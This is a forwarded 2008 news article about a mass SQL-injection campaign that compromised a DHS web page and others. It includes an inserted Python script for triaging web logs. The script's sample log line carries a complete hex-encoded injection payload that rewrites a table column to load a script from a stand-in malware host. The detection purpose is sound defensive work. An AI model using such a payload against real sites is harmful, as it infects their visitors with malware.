[Infowarrior] - DHS Website Compromised by SQL injection

Richard Forno rforno at infowarrior.org
Sat Apr 26 00:17:17 UTC 2008


Original URL: http://www.theregister.co.uk/2008/04/25/mass_web_attack_grows/
Department of Homeland Security website hacked!
By Dan Goodin
Published Friday 25th April 2008 18:57 GMT

The sophisticated mass infection that's injecting attack code into hundreds
of thousands of reputable web pages is growing and even infiltrated the
website of the Department of Homeland Security.

While so-called SQL injections are nothing new, this latest attack, which we
reported earlier
(http://www.theregister.co.uk/2008/04/24/mass_web_attack/), is notable for
its ability to infect huge numbers of pages using only a single string of
text. At time of writing, Google searches showed almost 520,000 pages
containing the infection string, though the exact number changes almost
constantly. As the screenshot below shows, even the DHS, which is
responsible for protecting US infrastructure against cyber attacks, wasn't
immune. Other hacked sites include those belonging to the United Nations and
the UK Civil Service.

[Screenshot of Google search showing DHS website]

The attack causes infected sites to redirect visitors to destinations that
attempt to install malware on vulnerable machines. At time of writing, the
malicious payloads attacked vulnerabilities that already have been patched.
And in any case all three of the redirection sites were down, possibly
because they were unable to handle the demand. But should the attackers get
their hands on a newer exploit - say, one targeting a zero-day vulnerability
in QuickTime 
(http://www.gnucitizen.org/blog/quicktime-0day-for-vista-and-xp/) - it would
be relatively easy for them to swap out the payload.

One reason the infection has spread so widely is the attackers have managed
to find a single attack string that seems to work on tens of thousands of
different sites. Most web applications are custom-built for a particular
site, so attackers likewise have to custom design attack parameters to
exploit weaknesses. Not so here.

"These guys look like they've found a methodology to get a successful SQL
injection generically across [many] websites," said Jeremiah Grossman, CTO
of WhiteHat Security, which helps companies secure web applications. "That
right there is like a skeleton key."

The script is also notable for its ability to slip past web application
defenses. The SQL query is mostly made up of HEX code, allowing it to
obscure itself, at least to apps that use Microsoft SQL. MySQL and
PostgreSQL are less easily fooled, according to researcher Ronald van den
Heetkamp (http://www.0x000000.com/?i=556).
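As an added example (not from the article or from the researchers quoted), here is a Python log-triage script a defender could run over web access logs: it URL-decodes each request target, decodes long 0x hex literals of the kind the article says Microsoft SQL servers will execute, and flags lines that carry SQL keywords either in the clear or inside the decoded literal. The log lines, host names and the malware.example domain are constructed for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample: a decoded statement of the kind the article describes
# (a table column rewritten to carry a script tag), hex-encoded for the log line.
INJECTED_SQL = "UPDATE news SET body=body+'<script src=\"http://malware.example/x.js\"></script>'"
INJECTED_HEX = INJECTED_SQL.encode("ascii").hex()

# Constructed Common Log Format lines; addresses and paths are hypothetical.
SAMPLE_LINES = [
    '10.0.0.5 - - [25/Apr/2008:10:00:01 +0000] "GET /news.aspx?id=42 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [25/Apr/2008:10:00:07 +0000] "GET /news.aspx?id=42;DECLARE%20@s%20VARCHAR(4000);'
    'SET%20@s=CAST(0x' + INJECTED_HEX + '%20AS%20VARCHAR(4000));EXEC(@s);-- HTTP/1.1" 200 5120',
]

HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]{8,})")   # only long 0x... runs, not small ids
SQL_MARKERS = ("DECLARE ", "CAST(", "EXEC(", "UPDATE ", "INSERT ", "DELETE ")
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def decode_hex(hex_digits):
    """Decode a SQL hex literal to text; None if it is not valid hex or not text-like."""
    try:
        raw = bytes.fromhex(hex_digits)
    except ValueError:          # odd length or stray characters
        return None
    # Heuristic: a NUL in every odd position means UTF-16LE (NVARCHAR payloads).
    if len(raw) >= 4 and all(b == 0 for b in raw[1::2]):
        text = raw.decode("utf-16-le", errors="replace")
    else:
        text = raw.decode("latin-1")
    return text if text.isprintable() else None

def analyze_request(log_line):
    """Return a triage dict for one access-log line, or None if no request target is found."""
    m = REQUEST_LINE.search(log_line)
    if not m:
        return None
    target = unquote_plus(m.group(1))           # %20 and + become spaces
    decoded = [t for t in (decode_hex(h) for h in HEX_LITERAL.findall(target)) if t]
    upper = target.upper()
    keyword_hit = any(k in upper for k in SQL_MARKERS)                   # SQL visible in the clear
    payload_hit = any(k in t.upper() for t in decoded for k in SQL_MARKERS)  # SQL hidden in hex
    return {"target": target, "decoded": decoded, "suspicious": keyword_hit or payload_hit}

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(analyze_request(line))
```

Decoding the literal matters because a keyword filter that never looks inside the hex sees only CAST/EXEC scaffolding; the decoded text is what tells an analyst which table and column were rewritten.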

Sites are getting pwned because they fail to sanitize user supplied data.
DHS security pros scrubbed the page clean the same day it got infected and
took steps to make sure the same attack couldn't succeed against other parts
of the DHS website, spokeswoman Amy Kudwa said.

"We're well aware of the fact that intrusions happen all the time and that's
why we are doing all that we are to secure the .gov domain," she said.

While the number of pages that have been infected is high, not all are able
to launch an attack once a user visits them, according to Roger Thompson,
chief research officer of anti-virus provider AVG.

"Very often they're on a page but the stuff doesn't actually fire when you
get there," he said. "This is not a cunning, premeditated task; it's just a
blast. They're just planting the stuff where they can and the result is a
lot of pages [that] don't do anything."

But webmasters should not be complacent about removing the injected code
from their sites and fixing buggy web apps to make sure more don't spring
up.

"It's the cleanup effort that's just going to be monstrous," said Grossman,
who said affected companies will have to either remove each overwritten
table record one at a time, or revert to a recent backup. "Either way, it's
going to take forever."

Security workers better get cracking. ®